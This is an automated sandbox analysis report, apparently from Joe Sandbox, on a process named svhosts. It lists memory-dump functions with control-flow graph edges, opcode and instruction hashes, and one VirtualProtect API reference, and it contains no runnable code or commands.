7ffd9ba22f5f-7ffd9ba22f7e 1002->1014 1011 7ffd9ba24743-7ffd9ba24748 1007->1011 1012 7ffd9ba2474b-7ffd9ba24756 1007->1012 1008->1007 1011->1012 1016 7ffd9ba24761-7ffd9ba247cf 1012->1016 1017 7ffd9ba24758-7ffd9ba2475d 1012->1017 1014->1013 1023 7ffd9ba247d1 1016->1023 1024 7ffd9ba247d7-7ffd9ba247f6 1016->1024 1017->1016 1023->1024
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2305699817.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffd9ba10000_svhosts.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b9a23b7a2d242403e16ea66de2c68b0b887e2e607ca364d099ebd07b05dbf04d
                                  • Instruction ID: c0134bfd410dea809e8e1898bb1508da32d735f47844240e7a27567cb7d2d3cc
                                  • Opcode Fuzzy Hash: b9a23b7a2d242403e16ea66de2c68b0b887e2e607ca364d099ebd07b05dbf04d
                                  • Instruction Fuzzy Hash: BEA1C571E09A1D8FEBA8EF58D855BE9B7E0FF54310F0041AAD44DD3292DE7469858B80
                                  Function 00007FFD9B8A04D0 Relevance: 1.1, Instructions: 1091COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2294875998.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffd9b8a0000_svhosts.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 82cd0c35de6fe23e3b993d60deb3a24ae786cd38fe744e16016e2ae3d895973d
                                  • Instruction ID: be08b6bb4f78d6513d4e897f47239ca4bd6976798a1da4316ad2483dbdea59e4
                                  • Opcode Fuzzy Hash: 82cd0c35de6fe23e3b993d60deb3a24ae786cd38fe744e16016e2ae3d895973d
                                  • Instruction Fuzzy Hash: 4882E230F19A1E4FEB6CEB68C4A16B977E2FF59300F554179D05AC7292DE38A942CB40
                                  Function 00007FFD9BA3B970 Relevance: .7, Instructions: 708COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2305699817.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffd9ba10000_svhosts.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 277da43ac57af13c9ee6e4d74d91e86fe6333908de8df8e2a85ef4d5cf994661
                                  • Instruction ID: 312d918828fc7acb9b9a9521fc73008df5579b9611c83061c06dc1b4116a88c3
                                  • Opcode Fuzzy Hash: 277da43ac57af13c9ee6e4d74d91e86fe6333908de8df8e2a85ef4d5cf994661
                                  • Instruction Fuzzy Hash: B9321430A0CB894BE378DB288865376B7D1FF55304F14467DE09EC32E6DE78A94A8781
                                  Function 00007FFD9BA13343 Relevance: .6, Instructions: 559COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2305699817.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffd9ba10000_svhosts.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ba41ca151239320797796c0c0e5ea73b6199412b4bead02a9ae7558f9ee17178
                                  • Instruction ID: a2f505ece96ccb7a783d689ddcb8fc71384e755b2efbc8528b170f754666eec2
                                  • Opcode Fuzzy Hash: ba41ca151239320797796c0c0e5ea73b6199412b4bead02a9ae7558f9ee17178
                                  • Instruction Fuzzy Hash: 75F1B031B1D78A0FE31D8F684CA61B577D1EF92215B1A42BED8DBC7197DC6468078281
                                  Function 00007FFD9BA39600 Relevance: .6, Instructions: 553COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2305699817.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffd9ba10000_svhosts.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ce9cd854d1345e9ef8930649fc4e843ab51fdda934fcf524f2aed75c118c25d3
                                  • Instruction ID: 15626f2c3d2006105527d33630be44d0a9b0b8727f1260cbe0e74b6c3fb88f9f
                                  • Opcode Fuzzy Hash: ce9cd854d1345e9ef8930649fc4e843ab51fdda934fcf524f2aed75c118c25d3
                                  • Instruction Fuzzy Hash: CAF1E531B19A4D4FEBA8EF6C88656B977D2FF98310F050179E44EC32E2DE74A8428741
                                  Function 00007FFD9B8A1189 Relevance: .5, Instructions: 486COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2294875998.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffd9b8a0000_svhosts.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 17ce96c692a772d515da89dd2a2c35cac2b695fa87cd0cb25973f9049efb3bc4
                                  • Instruction ID: e9c1b33463ceecde0a53f5b8a903a7e4ff67d3d226ad205f14dab61f415d1b84
                                  • Opcode Fuzzy Hash: 17ce96c692a772d515da89dd2a2c35cac2b695fa87cd0cb25973f9049efb3bc4
                                  • Instruction Fuzzy Hash: 75F1E231F19A0E4FEBA8EB68886567977E2FF99300F054179D00EC72E6DE38A945C741
                                  Function 00007FFD9B8A11E6 Relevance: .5, Instructions: 473COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2294875998.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffd9b8a0000_svhosts.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 74d509f98f6a1170d713ba54038f214966751f2986927d99cd98c1f839f55dbd
                                  • Instruction ID: 3c8c9d52475638c795188a483692720d2a2cb90f5d03ab9d62f99f4b1d342aa0
                                  • Opcode Fuzzy Hash: 74d509f98f6a1170d713ba54038f214966751f2986927d99cd98c1f839f55dbd
                                  • Instruction Fuzzy Hash: CCF1F231F19A0E4FEBA8EB6884616B973E2FF99310F054179D01EC72E6DE38A945C740
                                  Function 00007FFD9B963940 Relevance: .5, Instructions: 463COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2300823004.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffd9b960000_svhosts.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 300cf2e6deee6ec9555aed618a353efbe7d3bd288720f4583f09d6c568e4d344
                                  • Instruction ID: f8d80d1c65e1d797c788ad25a9d825e41222e58e6a15a498c427105a5c71f623
                                  • Opcode Fuzzy Hash: 300cf2e6deee6ec9555aed618a353efbe7d3bd288720f4583f09d6c568e4d344
                                  • Instruction Fuzzy Hash: C0D18111B2FB8E6FE3A653BC08752792BD19F86600F4A40BBD089C71F3DD1C6A069342
                                  Function 00007FFD9BA1C798 Relevance: .3, Instructions: 308COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2305699817.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffd9ba10000_svhosts.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 51fccf376b33782add180bf496db5572f64a3e90de166accd58518d7d34ff94a
                                  • Instruction ID: bc561c8bfcf10f44c6915e2fc41d5fb916292552f80af70faf8c099c87d6f6fb
                                  • Opcode Fuzzy Hash: 51fccf376b33782add180bf496db5572f64a3e90de166accd58518d7d34ff94a
                                  • Instruction Fuzzy Hash: F2A1B430F1D65E8BE7B8DF98C4A55BDB3A1FB45300F11613EC15B831A6EE79B9028681
                                  Function 00007FFD9B8A0E9E Relevance: .3, Instructions: 261COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2294875998.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffd9b8a0000_svhosts.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c0b71ae093a91f81f868fb7aca2ef996a4246ccf9064981368d223ea7892e087
                                  • Instruction ID: a21bf73a29727ff5cdf3eb3df97de2128665c0ae0c54e695ea419b307cb86f9e
                                  • Opcode Fuzzy Hash: c0b71ae093a91f81f868fb7aca2ef996a4246ccf9064981368d223ea7892e087
                                  • Instruction Fuzzy Hash: 079118B8E1850E8FEF58DB99D494ABDBBB1FF58301F012169D00AEB291CF35A941CB00
                                  Function 00007FFD9BA23C0D Relevance: .2, Instructions: 185COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2305699817.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffd9ba10000_svhosts.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0df9f305fcf70c2f0ae1ca4c398d92c159d9f4173532d3791b419478b96e675b
                                  • Instruction ID: 2ee060b942b653df4bdc9bf141a4e3d79bf54849ba4213ce503bd75f7cd8e907
                                  • Opcode Fuzzy Hash: 0df9f305fcf70c2f0ae1ca4c398d92c159d9f4173532d3791b419478b96e675b
                                  • Instruction Fuzzy Hash: 17511C7160D1918ED759B7B8B8A58E53B90DF01328B0945F7D05D8B0D7F958A582D381
                                  Function 00007FFD9BA230E7 Relevance: .1, Instructions: 117COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2305699817.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffd9ba10000_svhosts.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 39b2aa97c3cd2cd868d9600c0e5a923df25dd8d5b175ec05e4d4065420548ff9
                                  • Instruction ID: dea616ee7a1fe51e40a95ad2786ea8351a99dcaf06f01099f7e0f929b0c90773
                                  • Opcode Fuzzy Hash: 39b2aa97c3cd2cd868d9600c0e5a923df25dd8d5b175ec05e4d4065420548ff9
                                  • Instruction Fuzzy Hash: AA31D471B0C7494BEB2C8B5864221B9B3D1FF89760F05467FE09FC3691EE64A9024286
                                  Function 00007FFD9B8A4188 Relevance: 1.7, APIs: 1, Instructions: 196memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1034 7ffd9b8a4188-7ffd9b8ad4be 1036 7ffd9b8ad4c4-7ffd9b8ad51f call 7ffd9b8ace70 call 7ffd9b8a3fd0 1034->1036 1037 7ffd9b8ad542-7ffd9b8ad56d 1034->1037 1047 7ffd9b8ad535-7ffd9b8ad53b 1036->1047 1048 7ffd9b8ad521-7ffd9b8ad63c VirtualProtect 1036->1048 1047->1037 1054 7ffd9b8ad63e 1048->1054 1055 7ffd9b8ad644-7ffd9b8ad66c 1048->1055 1054->1055
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2294875998.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffd9b8a0000_svhosts.jbxd
                                  Similarity
                                  • API ID: ProtectVirtual
                                  • String ID:
                                  • API String ID: 544645111-0
                                  • Opcode ID: ce4bfcf88195ac502eb0c320fce63a5d115e1af362ac8f3a909e5b304aaf3869
                                  • Instruction ID: e8678f9d29c743cbf28141ca3e4bae59e16fe6d6899bf729c128592866b34cf7
                                  • Opcode Fuzzy Hash: ce4bfcf88195ac502eb0c320fce63a5d115e1af362ac8f3a909e5b304aaf3869
                                  • Instruction Fuzzy Hash: C1511B31B1CA1D4FDB58EB5C985A6BD77E1EB9C321F14427EE40EC3296DE34A8428781
                                  Function 00007FFD9B8A4150 Relevance: 1.7, APIs: 1, Instructions: 194memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1057 7ffd9b8a4150 1058 7ffd9b8a4155-7ffd9b8a417f 1057->1058
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2294875998.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffd9b8a0000_svhosts.jbxd
                                  Similarity
                                  • API ID: ProtectVirtual
                                  • String ID:
                                  • API String ID: 544645111-0
                                  • Opcode ID: 020015adeb514ab0bdada1b3b2c561ba59095b98b0e88433c87657ef7ad5adcf
                                  • Instruction ID: e7d2e1ff77ab3c9ba864b4d1a06cc695c0e76bcfdf53115015ea8284329f0d34
                                  • Opcode Fuzzy Hash: 020015adeb514ab0bdada1b3b2c561ba59095b98b0e88433c87657ef7ad5adcf
                                  • Instruction Fuzzy Hash: 53510831B0CA1D4FE71CABACA85A6FD77D1EB98325F04427FE00DC3296DE6468418785
                                  Function 00007FFD9B965D89 Relevance: 1.5, Strings: 1, Instructions: 261COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1364 7ffd9b965d89-7ffd9b965dc0 1366 7ffd9b965dc2-7ffd9b965dc4 1364->1366 1367 7ffd9b965e1f 1364->1367 1368 7ffd9b965e23-7ffd9b965e2b 1366->1368 1369 7ffd9b965dc6-7ffd9b965e1c 1366->1369 1367->1368 1372 7ffd9b965e2d-7ffd9b965e3e 1368->1372 1373 7ffd9b965e40-7ffd9b965e43 1368->1373 1369->1373 1377 7ffd9b965e1e 1369->1377 1372->1373 1375 7ffd9b965fe2-7ffd9b965fea 1373->1375 1376 7ffd9b965e49-7ffd9b965e50 1373->1376 1379 7ffd9b965e52-7ffd9b965e82 1376->1379 1380 7ffd9b965ec3-7ffd9b965eca 1376->1380 1377->1367 1379->1380 1385 7ffd9b965e84-7ffd9b965ea1 1379->1385 1381 7ffd9b965f3d-7ffd9b965f44 1380->1381 1382 7ffd9b965ecc-7ffd9b965ede 1380->1382 1386 7ffd9b965f46-7ffd9b965f75 1381->1386 1387 7ffd9b965fb7-7ffd9b965fbe 1381->1387 1384 7ffd9b965ee1-7ffd9b965f35 1382->1384 1402 7ffd9b965f37-7ffd9b965f3a 1384->1402 1395 7ffd9b965eab-7ffd9b965ec0 1385->1395 1392 7ffd9b965f78-7ffd9b965fb5 1386->1392 1387->1375 1389 7ffd9b965fc0-7ffd9b965fd8 1387->1389 1389->1375 1392->1387 1395->1380 1402->1381
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2300823004.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffd9b960000_svhosts.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: H
                                  • API String ID: 0-2852464175
                                  • Opcode ID: 36fafac9d7b69144b012d85d42027bff898c2ab56788612103473349e9b5d296
                                  • Instruction ID: fb42c12896514071a65aa37ef2c95e5e38d89ae94c2d9658b450a4e4ca7f4c46
                                  • Opcode Fuzzy Hash: 36fafac9d7b69144b012d85d42027bff898c2ab56788612103473349e9b5d296
                                  • Instruction Fuzzy Hash: 1B812931A2EB8D6FE7A6D75C8869665BBE1EF99300F05417FD088C72B2DE24E9018741
                                  Function 00007FFD9B96376B Relevance: 1.4, Strings: 1, Instructions: 171COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2300823004.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffd9b960000_svhosts.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @_H
                                  • API String ID: 0-518063247
                                  • Opcode ID: aedff9df237f81fe8cf10154035639bcceadab3140da33b43bf31cb750681f00
                                  • Instruction ID: a5df7fad7da180c1c0d8f5560e8708bf330bdc6d3fbb0d9a980d013cebeb5a9d
                                  • Opcode Fuzzy Hash: aedff9df237f81fe8cf10154035639bcceadab3140da33b43bf31cb750681f00
                                  • Instruction Fuzzy Hash: F4414251B3ED0F5EEABAA3AC04752BD02C3EFD9650B960279D44DC22F6DD1DEE024281
                                  Function 00007FFD9B962509 Relevance: .5, Instructions: 537COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2300823004.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffd9b960000_svhosts.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9c0a3824add57f56fb8df6d4782841c5a729948471518443cb2a4320f0e1c176
                                  • Instruction ID: 3d46cdc302409bd87de11556c49d2b79a7373ebd2095d9a17fe39af147cfe699
                                  • Opcode Fuzzy Hash: 9c0a3824add57f56fb8df6d4782841c5a729948471518443cb2a4320f0e1c176
                                  • Instruction Fuzzy Hash: DFE15421B2ED5F5EF6BAA3E8057167C23C2EFD8291B56027AD04DC62F7DD1CAA024341
                                  Function 00007FFD9B966BF5 Relevance: .4, Instructions: 411COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2300823004.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffd9b960000_svhosts.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 578509290dad39814aa5f05676e2827051b5b22965f06f9d79f04b1a68db1bd1
                                  • Instruction ID: 4721625648d7e514acb3fbaef0c0db1f486ad80ab2c017a083e58c1df36da508
                                  • Opcode Fuzzy Hash: 578509290dad39814aa5f05676e2827051b5b22965f06f9d79f04b1a68db1bd1
                                  • Instruction Fuzzy Hash: 01C15C10B3AE5E6FE7A5A7AC84B23B56386EF98B00F514079D14DC32E3CD19EE164781
                                  Function 00007FFD9B967939 Relevance: .3, Instructions: 333COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2300823004.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffd9b960000_svhosts.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1615e7ee0b03c9302c10d78204018a3e5a091595690ab049f67a92624da0edc0
                                  • Instruction ID: 9da443e6db40cc23c3e44ac3d4d2589b63487024963758669ed731ee95d55d29
                                  • Opcode Fuzzy Hash: 1615e7ee0b03c9302c10d78204018a3e5a091595690ab049f67a92624da0edc0
                                  • Instruction Fuzzy Hash: 1D91F621B2EE4F5FEAB69BBC447017967D2EF99610B5601B6D84DC31E3DD1CAE028381
                                  Function 00007FFD9B96726D Relevance: .3, Instructions: 256COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2300823004.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffd9b960000_svhosts.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 57eb258255a64df5eb0ae8a555f4c7091997876e395582ba9111c8ff5f8f4888
                                  • Instruction ID: cdb1821e5d9ea444ed0b25fc7ba9df8b2246d5f2ac175bda0fe1f274e860e05b
                                  • Opcode Fuzzy Hash: 57eb258255a64df5eb0ae8a555f4c7091997876e395582ba9111c8ff5f8f4888
                                  • Instruction Fuzzy Hash: 4861F522B2FE8E5FE7A697AC14741746B92EF99210B5601FAC84DC71F7DD1CAD018341
                                  Function 00007FFD9B9634F1 Relevance: .2, Instructions: 163COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2300823004.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffd9b960000_svhosts.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4dbf13c2d30eac003865851eb4d3c9d7aa7dc1886c569552ac90cc812148df1c
                                  • Instruction ID: 135c8053b969065a48b03f6ecb08238f0ee200edf97e500a73eccd153e544d48
                                  • Opcode Fuzzy Hash: 4dbf13c2d30eac003865851eb4d3c9d7aa7dc1886c569552ac90cc812148df1c
                                  • Instruction Fuzzy Hash: C341A511B2EB8E2FE7A697AC44762756BD2EF99600F4A41BBD04CC72E3DC189E058341
                                  Function 00007FFD9B966FE1 Relevance: .1, Instructions: 141COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2300823004.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffd9b960000_svhosts.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3fd292cbe89d09e4c6b5a9083a68c73172336507eb3c5925ac3fd211565387e9
                                  • Instruction ID: 968c8c16bcffe5320a4f33ba99e355524d8673771b7f08019d4d580e48e57092
                                  • Opcode Fuzzy Hash: 3fd292cbe89d09e4c6b5a9083a68c73172336507eb3c5925ac3fd211565387e9
                                  • Instruction Fuzzy Hash: 7C41F621B2EB8A1FE3A697BC54716707BA1AF87610F0A81FBC488C71E3DD1DAD058351
                                  Function 00007FFD9B961567 Relevance: .1, Instructions: 120COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2300823004.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffd9b960000_svhosts.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 22c170b29909f67ae3e6a1856b191784be1e102f9d3e2a2300c763ef253a2e93
                                  • Instruction ID: 1e155c2730aba7f7c756981db9ddad016aa525b2672e6c4c2599ef6dd31752b8
                                  • Opcode Fuzzy Hash: 22c170b29909f67ae3e6a1856b191784be1e102f9d3e2a2300c763ef253a2e93
                                  • Instruction Fuzzy Hash: 9A316721B29E4E5FFBA9D76C047523962C2EFDC64175A027AD45EC72E6ED28ED024340
                                  Function 00007FFD9B961F47 Relevance: .1, Instructions: 116COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2300823004.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffd9b960000_svhosts.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8a1f5060064d84b0bdf78854146edc1c6f90e536bebec6dc455cdc5571d4f2ea
                                  • Instruction ID: 03384d95d98145dde16ad86c15c9383c4e4bd440c40de54ac462de3009e3db6b
                                  • Opcode Fuzzy Hash: 8a1f5060064d84b0bdf78854146edc1c6f90e536bebec6dc455cdc5571d4f2ea
                                  • Instruction Fuzzy Hash: 0D317921B2AE4E5FF7B9D36C047523926C2EFD864175A427AD45EC72E6EE28ED024300
                                  Function 00007FFD9B96181F Relevance: .1, Instructions: 116COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2300823004.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffd9b960000_svhosts.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 01c8086243f9c6831b17bda662a037c240855521108eedb1d215e3c5ed13f1c4
                                  • Instruction ID: bd1d250db33cc8e9a5f9056cfb202857a7cad79c7a3ade775a07176755b35ea6
                                  • Opcode Fuzzy Hash: 01c8086243f9c6831b17bda662a037c240855521108eedb1d215e3c5ed13f1c4
                                  • Instruction Fuzzy Hash: F5317711B2AE4E5FFBB9D36C047523D22C2EFD864175A427AD45EC72E6ED29ED024300
                                  Function 00007FFD9B96202C Relevance: .1, Instructions: 116COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2300823004.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffd9b960000_svhosts.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0b8304e101bf07c7c75ef309f814ad1d4aa7e4cdaa78d3654f5e79c8e87296a3
                                  • Instruction ID: 2a2ff0414e226adcda892ca405922247614d306498c49dd02478ff2e5df26d2e
                                  • Opcode Fuzzy Hash: 0b8304e101bf07c7c75ef309f814ad1d4aa7e4cdaa78d3654f5e79c8e87296a3
                                  • Instruction Fuzzy Hash: 3231A911B2AE4E4FF7B5D7AC047163923C2EFD864175A027AD44EC72E6ED28ED024301
                                  Function 00007FFD9B96173A Relevance: .1, Instructions: 116COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2300823004.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffd9b960000_svhosts.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d6b41512b15c87c7c9cfbd76640f1d68d900d4b84d1e2d7fb383af97dbf9b6f3
                                  • Instruction ID: 64cfa09e4a7a1edb7b7e07b9aafba403876c91d496ba7fc42dd2689b87bdb5e1
                                  • Opcode Fuzzy Hash: d6b41512b15c87c7c9cfbd76640f1d68d900d4b84d1e2d7fb383af97dbf9b6f3
                                  • Instruction Fuzzy Hash: EB318911B2AE4E5FE7B9D3AC047523963C2EFD864175A027AD45EC72F6ED28ED024300
                                  Function 00007FFD9B96307E Relevance: .0, Instructions: 20COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2300823004.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffd9b960000_svhosts.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: afd6340ccce913f1f82ab950ff3215dc3680a2991eb5f26c7830d570270e4d7b
                                  • Instruction ID: d0134029b232e5a62dd7e5ba6007e79e4ff3a066fdc2316c1e1db0d0b03fc425
                                  • Opcode Fuzzy Hash: afd6340ccce913f1f82ab950ff3215dc3680a2991eb5f26c7830d570270e4d7b
                                  • Instruction Fuzzy Hash: 46D0C901B2E51A47F22832CCB8663B8B385DBCC614F514137E10DC27D6C85EAD824282

                                  Non-executed Functions

                                  Function 00007FFD9B965FEB Relevance: 4.4, Strings: 3, Instructions: 686COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2300823004.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffd9b960000_svhosts.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: H$H$H
                                  • API String ID: 0-1989617792
                                  • Opcode ID: 757f041315b6c3d7028389e85d073130818edd226ff033e792cb0c0fd40d88d8
                                  • Instruction ID: 21d9c9fea342fb58fe951bfe99787359aefb228a381e4ed617edd2fe8f265781
